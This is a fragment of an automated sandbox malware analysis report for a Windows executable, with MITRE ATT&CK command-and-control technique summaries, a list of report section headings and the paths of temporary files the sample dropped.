Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report eoIIBcxUj3.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut1D06.tmp

C:\Users\user\AppData\Local\Temp\aut1F88.tmp

C:\Users\user\AppData\Local\Temp\p46Q44o9

C:\Users\user\AppData\Local\Temp\snaith

C:\Users\user\AppData\Local\Temp\underbalanced

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
eoIIBcxUj3.exe